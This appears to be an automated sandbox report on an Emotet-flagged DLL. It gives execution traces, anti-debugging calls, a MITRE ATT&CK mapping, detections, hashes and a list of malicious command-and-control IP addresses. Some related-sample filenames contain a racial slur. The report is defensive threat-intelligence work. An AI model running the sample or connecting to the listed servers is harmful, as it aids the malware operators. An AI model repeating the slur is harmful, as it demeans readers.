Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EAA12CB mov ecx, dword ptr fs:[00000030h]	2_2_6EAA12CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EAA298C mov eax, dword ptr fs:[00000030h]	2_2_6EAA298C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00524315 mov eax, dword ptr fs:[00000030h]	3_2_00524315
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003D4315 mov eax, dword ptr fs:[00000030h]	5_2_003D4315

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00A6E259 LdrInitializeThunk,

0_2_00A6E259

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA9CB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6EA9CB22
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EAA29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6EAA29E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA9D1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6EA9D1CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EA9CB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6EA9CB22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EAA29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EAA29E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EA9D1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EA9D1CC

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 272	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4668 -ip 4668	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 324	Jump to behavior

Source: loaddll32.exe, 00000000.00000000.614311053.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.615784660.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.597627953.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.596883586.0000000001240000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000000.614311053.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.615784660.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.597627953.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.596883586.0000000001240000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.614311053.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.615784660.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.597627953.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.596883586.0000000001240000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.614311053.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.615784660.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.597627953.0000000001240000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.596883586.0000000001240000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA9CC44 cpuid

0_2_6EA9CC44

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA9CE15 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6EA9CE15

Source: Amcache.hve.17.dr, Amcache.hve.LOG1.17.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.17.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.17.dr, Amcache.hve.LOG1.17.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0.0.loaddll32.exe.a60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.622160.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2ce22d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2ce22d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b93b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.742148.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.622160.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.742148.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.8e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2d44168.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2d44168.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b93b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.598946349.000000000072A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.596768757.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.615675303.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.557368858.0000000002D65000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595689976.000000000060A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.597386823.00000000008E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.643045864.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.597549993.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.613993965.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.615392489.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.598782764.00000000003C0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.597443170.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599282857.0000000002D2A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.699398284.0000000002CCA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.596835233.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.614123815.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595650059.0000000000510000.00000040.00000010.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection12	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Security Software Discovery51	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Information Discovery33	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6zAcNlJXo7.dll	23%	Virustotal		Browse
6zAcNlJXo7.dll	24%	ReversingLabs	Win32.Trojan.Injuke

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.970000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.a60000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.510000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.2.loaddll32.exe.a60000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.a60000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.3c0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.8e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.a60000.9.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.a60000.6.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.ver)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.ver)	svchost.exe, 00000008.00000003.547746216.00000162642A0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.557044428.00000162642A0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.700137823.00000162642A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://upx.sf.net	Amcache.hve.17.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
104.245.52.73	unknown	United States	63251	METRO-WIRELESSUS	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
51.68.175.8	unknown	France	16276	OVHFR	true
103.8.26.102	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
41.76.108.46	unknown	South Africa	327979	DIAMATRIXZA	true
103.8.26.103	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
212.237.5.209	unknown	Italy	31034	ARUBA-ASNIT	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
210.57.217.132	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.184.25.237	unknown	Turkey	209711	MUVHOSTTR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
104.251.214.46	unknown	United States	54540	INCERO-HVVCUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532221
Start date:	01.12.2021
Start time:	20:58:28
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	6zAcNlJXo7.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.evad.winDLL@32/18@0/30
EGA Information:	Failed
HDC Information:	Successful, ratio: 17.9% (good quality ratio 17.3%) Quality average: 73.3% Quality standard deviation: 24.2%
HCA Information:	Successful, ratio: 79% Number of executed functions: 44 Number of non-executed functions: 170
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.42.73.29 Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:01:14	API Interceptor	1x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
195.154.133.20	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse
	uLCt7sc5se.dll	Get hash	malicious	Browse
	rGF1Xgw9Il.dll	Get hash	malicious	Browse
	nBtjFS1D08.dll	Get hash	malicious	Browse
212.237.17.99	6zAcNlJXo7.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse
	uLCt7sc5se.dll	Get hash	malicious	Browse
	rGF1Xgw9Il.dll	Get hash	malicious	Browse
	nBtjFS1D08.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ARUBA-ASNIT	6zAcNlJXo7.dll	Get hash	malicious	Browse	212.237.56.116
	DHL DOCUMENT FOR #504.exe	Get hash	malicious	Browse	62.149.128.40
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	xTpcaEZvwmHqwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	xTpcaEZvwmHqwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	invoice template 33142738819.docx	Get hash	malicious	Browse	94.177.217.88
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	212.237.56.116
OnlineSASFR	6zAcNlJXo7.dll	Get hash	malicious	Browse	195.154.133.20
	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	51.15.17.195
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	195.154.133.20
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	67MPsax8fd.exe	Get hash	malicious	Browse	163.172.208.8
	Linux_x86	Get hash	malicious	Browse	212.83.174.79
	184285013-044310-Factura pendiente (2).exe	Get hash	malicious	Browse	212.83.130.20
	MTjXit7IJn	Get hash	malicious	Browse	51.158.219.54
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse	195.154.133.20

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.2485944511597269
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4G:BJiRdwfu2SRU4G
MD5:	5AA9010F86AAA454CA8AEE0BC5432844
SHA1:	6386A8DADB09CD4AAB9D91049CD1D1963B92A931
SHA-256:	47DA8C9FC8223551A0BD062C9DECFC1D0D6F9AFD5FDD71D3708F4A019B47ED4A
SHA-512:	E23E7173DD345E611CBA31DFB30C896E2D4CB00B50E099CAE0C69415BA53A607FF19BF102672CB5524E0A04E3D3AA80047A71D2E58DFBF69281E7ECF7A7A8011
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xce62c60e, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25065042679573807
Encrypted:	false
SSDEEP:	384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
MD5:	6AB5EC32ABEAAD3B2D169DAD0DB571C1
SHA1:	678C6CFA14486816AEE71C4414F21ADAD5FD6188
SHA-256:	7246BA67A66D83694DECB8DA5F406339E7D4DD0BC106A0434FA3A18DE8DB9267
SHA-512:	3DF86A60CA8C704905450B1BE34110BE196CBC3452ED240A4FAACC87944A4EE03839DEEF9A810991AE7AEB75763EC110F15C0CE02EB3B02F6F0535BF4BD9B7C6
Malicious:	false
Preview:	.b..... ................e.f.3...w........................&..........w.......ya.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................Oo......y'q................s.).....ya.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07670392576224366
Encrypted:	false
SSDEEP:	3:eEXll9EvrppcwAl/bJdAti5fgnp0ll3Vkttlmlnl:eE1lYVpvAt46fgK3
MD5:	D931A9ECA494794C06C28E09F3FEED68
SHA1:	A58E08E3E371B8B5FA3BBC3F794D8AFA3FE80466
SHA-256:	84BE51EED8346F223265ADF7BD72801632C85C5B6E7459BC7446E62095ADF39D
